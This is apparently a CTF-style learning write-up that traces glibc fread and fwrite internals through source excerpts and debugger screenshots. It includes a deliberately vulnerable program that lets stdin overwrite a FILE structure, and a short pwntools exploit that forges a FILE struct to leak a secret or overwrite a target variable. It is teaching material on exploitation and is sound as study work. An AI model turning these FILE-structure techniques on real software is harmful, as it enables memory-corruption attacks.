<h4 id="STAGE3"><a href="#STAGE3" class="headerlink" title="STAGE3"></a><font style="color:rgb(31, 9, 9);">STAGE3</font></h4><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">JUST open it again,let ‘s reback here.’</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">After execute the _IO_read_file we can see this </font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_ssize_t<br>_IO_file_read (_IO_FILE *fp, void *buf, _IO_ssize_t size)<br>&#123;<br>   return (__builtin_expect (fp-&gt;_flags2 &amp; _IO_FLAGS2_NOTCANCEL, 0)<br>           ? read_not_cancel (fp-&gt;_fileno, buf, size)<br>           : read (fp-&gt;_fileno, buf, size));<br> &#125;<br></code></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245480262-4d17bc8f-1fb1-4eef-9d6a-b49728065760.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245480262-4d17bc8f-1fb1-4eef-9d6a-b49728065760.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Here we have let our flag into the buf and have set all the points.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Then, try to see the heap</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245485092-fb323d3f-3e92-4548-8662-93209aafaf84.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245485092-fb323d3f-3e92-4548-8662-93209aafaf84.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Here must be our PTR which we finally will let flag in.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">let’s continue to trace.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245489165-85280278-55e6-4bbf-9249-df6777ec8da7.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245489165-85280278-55e6-4bbf-9249-df6777ec8da7.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">We can see the end of read ptr will add the size of flag</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245493793-82a72b74-2f1f-4cf0-b0cd-bafb3a209b84.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245493793-82a72b74-2f1f-4cf0-b0cd-bafb3a209b84.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Then we back to _IO_file_xsgetn as below</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245501266-ae6b8759-d46f-4d8f-ab89-8360911f5c8f.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245501266-ae6b8759-d46f-4d8f-ab89-8360911f5c8f.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">This time we will go to a place which want&gt;have but have&gt;0</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245509873-371163e5-fb79-4d33-9146-dfb13e67b158.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245509873-371163e5-fb79-4d33-9146-dfb13e67b158.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">And we exactlly go there i am right</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245514695-6ea675dd-8261-4d93-bf02-74d2842564b3.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245514695-6ea675dd-8261-4d93-bf02-74d2842564b3.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">After the memcpy we can definitly see flag be the place in the heap</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245518927-1f079d9a-5ea0-4da5-8c6c-bd6debae13b7.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245518927-1f079d9a-5ea0-4da5-8c6c-bd6debae13b7.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Also we will continue to go to wiile because the size of flag is 18 but we need 2 more. if you are confused, just see the source code above.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Let us see this picture </font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245526560-a65d434f-65d8-4bcd-ae01-e6423b673216.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245526560-a65d434f-65d8-4bcd-ae01-e6423b673216.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">We back here and go the way.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Till here, all about the fread has been done, that’s fun, isn’t it?</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">NONONO, we still have something to do</font></p>
<h2 id="PART3"><a href="#PART3" class="headerlink" title="PART3 "></a><font style="color:rgb(31, 9, 9);">PART3 </font></h2><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Hold on BRO, we are nearly here!!!</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><em><strong><font style="color:rgb(31, 9, 9);">When we call the fread function, it first checks if our buf is not empty, and then it does the build. Next, he will shift all the pointers towards the buf base. Execute the read function inside, read the contents of the file to our buff position, and mutate the read end pointed. Returning to the loop, If we what we have bigger then we want, we can allocate them directly. If we still want more than we have, we will allocate a portion and go through the above steps again. This is the entire process of this function</font></strong></em></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">NOW, i mean we should just reback to the exp for why it can success.</font></p>
<p>payload &#x3D; fp.read(win_var_leak, 20)&#96;&#96;&#96;</p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">This is what we do!</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">And we do make the fp amazingggg</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_read_ptr: 0x0<br> _IO_read_end: 0x0<br> _IO_read_base: 0x0<br> _IO_write_base: 0x0<br> _IO_write_ptr: 0x0<br> _IO_write_end: 0x0<br> _IO_buf_base: 0x63cc3dfd4014<br> _IO_buf_end: 0x63cc3dfd4028<br> ...<br> fileno: 0x0<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	When our fread see this. And we still go to the function _IO_file_xsgetn, but this time we check for we have buf addr. so we go straight to the __underflow and this time we read from stdin because we make fileno 0x0, so when we put our data in the terminal, we will make them fill the win_var_addr. then we can trigger the WIN. That’s it.</font></p>
<h1 id="I-O-Learning-–the-func-fwrite"><a href="#I-O-Learning-–the-func-fwrite" class="headerlink" title="I&#x2F;O Learning –the func fwrite"></a>I&#x2F;O Learning –the func fwrite</h1><p>  HI guys. It’s me again. Now i will let the ‘I&#x2F;O Learning’ to the second part. we will go to the func fwrite.</p>
<h2 id="PART1-1"><a href="#PART1-1" class="headerlink" title="PART1"></a>PART1</h2><p>As the beginning, we should alawys check the Flowchart：</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764133743576-6e28b3ac-adf5-4e3e-9321-23280f050ad1.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764133743576-6e28b3ac-adf5-4e3e-9321-23280f050ad1.png"></p>
<p>As similarly, we make a simple program to strace the whole flow.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include&lt;stdio.h&gt;<br><br>int main()&#123;<br><br>    FILE* fp = fopen(&quot;flag&quot;,&quot;wb&quot;);<br>    char *ptr = malloc(0x20);<br>    fwrite(ptr, 1, 0x20, fp);<br>    return 0;<br>&#125; <br></code></pre></td></tr></table></figure>

<p>Just as before we break at line 7 and use r</p>
<h3 id="STAGE1-1"><a href="#STAGE1-1" class="headerlink" title="STAGE1"></a>STAGE1</h3><!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764134453913-ab4d58c3-5723-4326-b6ff-939c3c736e73.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764134453913-ab4d58c3-5723-4326-b6ff-939c3c736e73.png"></p>
<p>here we continue to step</p>
<p>At beginning, almost no points has been initialized.</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764134987378-d45b30b6-7cf3-4104-935a-2089e05dd618.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764134987378-d45b30b6-7cf3-4104-935a-2089e05dd618.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764134619168-94ad9aeb-bdaf-451c-b68d-c6ad751c3b97.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764134619168-94ad9aeb-bdaf-451c-b68d-c6ad751c3b97.png"></p>
<p>Here, we enter the first function _IO_new_file_xsputn. Its primary function is to determine how much space is left in the output buffer.</p>
<p>In the scenario described by the sample program, values like f-&gt;_IO_write_end and f-&gt;_IO_write_ptr are both 0, indicating that the current output buffer size is 0.</p>
<p>Another part of its logic is that if the output buffer still has free space, it copies the target (<em><strong>in the program we called “ptr” also called “s”</strong></em>) output data into this buffer. It then calculates whether any target data remains after the output buffer has been filled.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_size_t<br>_IO_new_file_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)<br>&#123; <br><br>    _IO_size_t count = 0;<br>...<br>    else if (f-&gt;_IO_write_end &gt; f-&gt;_IO_write_ptr)<br>    count = f-&gt;_IO_write_end - f-&gt;_IO_write_ptr; /* Space available. */<br>  if (count &gt; 0)<br>    &#123;<br>      if (count &gt; to_do)<br>  count = to_do;<br>  ...<br>      memcpy (f-&gt;_IO_write_ptr, s, count);<br>      f-&gt;_IO_write_ptr += count;<br>      s += count;<br>      to_do -= count;<br></code></pre></td></tr></table></figure>

<pre><code>Certainly, we will go to the way where count = 0. Then we will step into _IO_OVERFLOW
</code></pre>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764136478308-d1e51d65-4779-4fad-b4d4-68e3f4769f1a.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764136478308-d1e51d65-4779-4fad-b4d4-68e3f4769f1a.png"></p>
<h3 id="STAGE2-1"><a href="#STAGE2-1" class="headerlink" title="STAGE2"></a>STAGE2</h3><p>We go step!</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764136725026-722def3c-41c9-4d8d-8bbf-03fbaf2da0ca.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764136725026-722def3c-41c9-4d8d-8bbf-03fbaf2da0ca.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><code class="hljs plain">int<br>_IO_new_file_overflow (FILE *f, int ch)<br>&#123;<br>  if (f-&gt;_flags &amp; _IO_NO_WRITES) /* SET ERROR */<br>    &#123;<br>      f-&gt;_flags |= _IO_ERR_SEEN;<br>      __set_errno (EBADF);<br>      return EOF;<br>    &#125;<br>  /* If currently reading or no buffer allocated. */<br>  if ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) == 0 || f-&gt;_IO_write_base == NULL)<br>    &#123;<br>      /* Allocate a buffer if needed. */<br>      if (f-&gt;_IO_write_base == NULL)<br>	&#123;<br>	  _IO_doallocbuf (f);<br>	  _IO_setg (f, f-&gt;_IO_buf_base, f-&gt;_IO_buf_base, f-&gt;_IO_buf_base);<br>	&#125;<br>      /* Otherwise must be currently reading.<br>	 If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,<br>	 logically slide the buffer forwards one block (by setting the<br>	 read pointers to all point at the beginning of the block).  This<br>	 makes room for subsequent output.<br>	 Otherwise, set the read pointers to _IO_read_end (leaving that<br>	 alone, so it can continue to correspond to the external position). */<br>      if (__glibc_unlikely (_IO_in_backup (f)))<br>	&#123;<br>	  size_t nbackup = f-&gt;_IO_read_end - f-&gt;_IO_read_ptr;<br>	  _IO_free_backup_area (f);<br>	  f-&gt;_IO_read_base -= MIN (nbackup,<br>				   f-&gt;_IO_read_base - f-&gt;_IO_buf_base);<br>	  f-&gt;_IO_read_ptr = f-&gt;_IO_read_base;<br>	&#125;<br><br>      if (f-&gt;_IO_read_ptr == f-&gt;_IO_buf_end)<br>	f-&gt;_IO_read_end = f-&gt;_IO_read_ptr = f-&gt;_IO_buf_base;<br>      f-&gt;_IO_write_ptr = f-&gt;_IO_read_ptr;<br>      f-&gt;_IO_write_base = f-&gt;_IO_write_ptr;<br>      f-&gt;_IO_write_end = f-&gt;_IO_buf_end;<br>      f-&gt;_IO_read_base = f-&gt;_IO_read_ptr = f-&gt;_IO_read_end;<br><br>      f-&gt;_flags |= _IO_CURRENTLY_PUTTING;<br>      if (f-&gt;_mode &lt;= 0 &amp;&amp; f-&gt;_flags &amp; (_IO_LINE_BUF | _IO_UNBUFFERED))<br>	f-&gt;_IO_write_end = f-&gt;_IO_write_ptr;<br>    &#125;<br>  if (ch == EOF)<br>    return _IO_do_write (f, f-&gt;_IO_write_base,<br>			 f-&gt;_IO_write_ptr - f-&gt;_IO_write_base);<br>  if (f-&gt;_IO_write_ptr == f-&gt;_IO_buf_end ) /* Buffer is really full */<br>    if (_IO_do_flush (f) == EOF)<br>      return EOF;<br>  *f-&gt;_IO_write_ptr++ = ch;<br>  if ((f-&gt;_flags &amp; _IO_UNBUFFERED)<br>      || ((f-&gt;_flags &amp; _IO_LINE_BUF) &amp;&amp; ch == &#x27;\n&#x27;))<br>    if (_IO_do_write (f, f-&gt;_IO_write_base,<br>		      f-&gt;_IO_write_ptr - f-&gt;_IO_write_base) == EOF)<br>      return EOF;<br>  return (unsigned char) ch;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>The __overflow function first checks if the flags field of the _IO_FILE structure contains the _IO_NO_WRITES flag. If the flag is set, the function returns immediately.</p>
<p>It then checks if f-&gt;_IO_write_base is NULL. A NULL value indicates that the output buffer has not been initialized&#x2F;allocated. In this case, the function calls _IO_doallocbuf to allocate the output buffer.</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764137049842-6ef7ca78-c9fa-4759-866a-523e0692e5b7.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764137049842-6ef7ca78-c9fa-4759-866a-523e0692e5b7.png"></p>
<p>As we have already analyzed the source code of the _IO_doallocbuf function in the previous section on fread, we will not delve into it again here. we just see the result. But notice one thing, HERE we also Initialize the read point by using the func of _IO_setg.   </p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764137203919-a532b752-ab81-47b2-baed-50fc36448e98.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764137203919-a532b752-ab81-47b2-baed-50fc36448e98.png"></p>
<p>Then after some Assign, we can see all the point has the values.</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764138746864-d5ce112d-8f1d-44b6-9d3e-a9c5da1a5919.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764138746864-d5ce112d-8f1d-44b6-9d3e-a9c5da1a5919.png"></p>
<p>Continue to next func</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764139063733-dcb5babd-5bf5-46cf-8a76-0f5c68c8a8ab.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764139063733-dcb5babd-5bf5-46cf-8a76-0f5c68c8a8ab.png"></p>
<p>The function calls new_do_write; step into it. The implementation is in &#x2F;libio&#x2F;fileops.c.</p>
<p><em><strong>We can see there to_do is 0 because  the write base is the same as write ptr so we will never go to new_do_write. then we ret with 0 then we ret to the upper-level function, I will make a direcction below.</strong></em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plain">if (ch == EOF)<br>  return _IO_do_write (f, f-&gt;_IO_write_base,<br>     f-&gt;_IO_write_ptr - f-&gt;_IO_write_base);<br>if (f-&gt;_IO_write_ptr == f-&gt;_IO_buf_end ) /* Buffer is really full */<br>  if (_IO_do_flush (f) == EOF) ## <br>    return EOF;<br></code></pre></td></tr></table></figure>

<p>Here we will also got a 0 and goto <em><strong>upper-level function</strong></em></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764219270181-e4a6337e-ada9-483e-9705-e8c3043f2279.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764219270181-e4a6337e-ada9-483e-9705-e8c3043f2279.png"></p>
<p>Just use step we will step into the function below</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764219484451-b226ad92-dc6d-4aca-a396-2260c586b74f.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764219484451-b226ad92-dc6d-4aca-a396-2260c586b74f.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_default_xsputn (FILE *f, const void *data, size_t n)<br>&#123;<br>  const char *s = (char *) data;<br>  size_t more = n;<br>  if (more &lt;= 0)<br>    return 0;<br>  for (;;)<br>    &#123;<br>      /* Space available. */<br>      if (f-&gt;_IO_write_ptr &lt; f-&gt;_IO_write_end)<br>	&#123;<br>	  size_t count = f-&gt;_IO_write_end - f-&gt;_IO_write_ptr;<br>	  if (count &gt; more)<br>	    count = more;<br>	  if (count &gt; 20)<br>	    &#123;<br>	      f-&gt;_IO_write_ptr = __mempcpy (f-&gt;_IO_write_ptr, s, count);<br>	      s += count;<br>	    &#125;<br>	  else if (count)<br>	    &#123;<br>	      char *p = f-&gt;_IO_write_ptr;<br>	      ssize_t i;<br>	      for (i = count; --i &gt;= 0; )<br>		*p++ = *s++;<br>	      f-&gt;_IO_write_ptr = p;<br>	    &#125;<br>	  more -= count;<br>	&#125;<br>      if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)<br>	break;<br>      more--;<br>    &#125;<br>  return n - more;<br>&#125;<br>libc_hidden_def (_IO_default_xsputn)<br></code></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764219776930-dc2a887f-0019-4e72-be65-ba8a097a7a6b.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764219776930-dc2a887f-0019-4e72-be65-ba8a097a7a6b.png"></p>
<p>After we go there</p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764220217673-ad935990-34b3-4a0b-a222-0fae07392b9c.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764220217673-ad935990-34b3-4a0b-a222-0fae07392b9c.png"></p>
<p>We can see the write ptr has add the 0x20 due to the f-&gt;_IO_write_ptr &#x3D; __mempcpy (f-&gt;_IO_write_ptr, s, count);</p>
<p>if we use the program below we could see something more!!!</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include&lt;stdio.h&gt;<br>#include&lt;stdlib.h&gt;<br>int main()&#123;<br><br>    FILE* fp = fopen(&quot;./flag&quot;,&quot;ab&quot;);<br>    char *ptr = malloc(0x20);<br>    strcpy(ptr, &quot;flag&#123;123456789&#125;&quot;);<br>    fwrite(ptr, 1, 0x20, fp);<br>    return 0;<br>&#125; <br></code></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764237723575-c81c908a-070b-4c4b-af1c-40f5d151fe7d.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764237723575-c81c908a-070b-4c4b-af1c-40f5d151fe7d.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764237697387-cd83f39e-1e86-4b1d-8afd-3a00b5bbb824.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764237697387-cd83f39e-1e86-4b1d-8afd-3a00b5bbb824.png"></p>
<p><em><strong>The same as our read let the data on our ptr first, then to write or read</strong></em> </p>
<p>(Before we go continue we check our flag find out it was cleared????WHY</p>
<p>because we use w as its arg, so as the func open finished all the flag will be cleared)</p>
<h2 id="PART2-1"><a href="#PART2-1" class="headerlink" title="PART2"></a>PART2</h2><p>Now we back to the vedio.</p>
<p>Rob make this program.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include &lt;stdio.h&gt;<br>#include &lt;unistd.h&gt;<br><br>char secret_message[] = &quot;SECRET_FLAG_VALUE&quot;;<br><br>int main(int argc, char **argv) &#123;<br>    // leak secret_message<br>    printf(&quot;secret_message is located at: %p\n&quot;, &amp;secret_message);<br><br>    // Open a file<br>    FILE *file_pointer = fopen(&quot;/dev/null&quot;, &quot;w&quot;);<br><br>    // Overwrite the file struct from stdin<br>    read(0, file_pointer, 0x100);<br><br>    // Call fwrite on the file<br>    char buf[256];<br>    puts(&quot;Calling fwrite!&quot;);<br>    fwrite(buf, 1, 40, file_pointer);<br><br>    return 0;<br>&#125;<br></code></pre></td></tr></table></figure>

<pre><code>We also make the exp for this problem
</code></pre>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs plain">from pwn import *<br><br>context.arch = &#x27;amd64&#x27;<br>p = process(&#x27;./a.out&#x27;)<br>p.recvuntil(b&#x27;at: &#x27;)<br>win_var_leak = int(p.recvline()[:-1],16) <br>print(hex(win_var_leak))<br><br>fp = FileStructure()<br>payload = fp.write(win_var_leak, 20)<br>print(fp)<br>p.send(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<pre><code>As we can see 
</code></pre>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764239241548-985193fe-4f3d-4eb3-8200-92c3794d46f3.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764239241548-985193fe-4f3d-4eb3-8200-92c3794d46f3.png"></p>
<p>Let’s have some check</p>
<p>In the func of  _IO_new_file_overflow, we could see one thing</p>
<p>if ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) &#x3D;&#x3D; 0 || f-&gt;_IO_write_base &#x3D;&#x3D; NULL), we will go straight to the place </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">if (ch == EOF)<br>    return _IO_do_write (f, f-&gt;_IO_write_base,<br>			 f-&gt;_IO_write_ptr - f-&gt;_IO_write_base);<br></code></pre></td></tr></table></figure>

<pre><code>we go to this func 
</code></pre>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span><br>_IO_new_do_write (_IO_FILE *fp, <span class="hljs-type">const</span> <span class="hljs-type">char</span> *data, _IO_size_t to_do)<br>&#123;<br>  <span class="hljs-keyword">return</span> (to_do == <span class="hljs-number">0</span><br>    || (_IO_size_t) new_do_write (fp, data, to_do) == to_do) ? <span class="hljs-number">0</span> : EOF;<br>&#125;   <br>libc_hidden_ver (_IO_new_do_write, _IO_do_write)<br></code></pre></td></tr></table></figure>

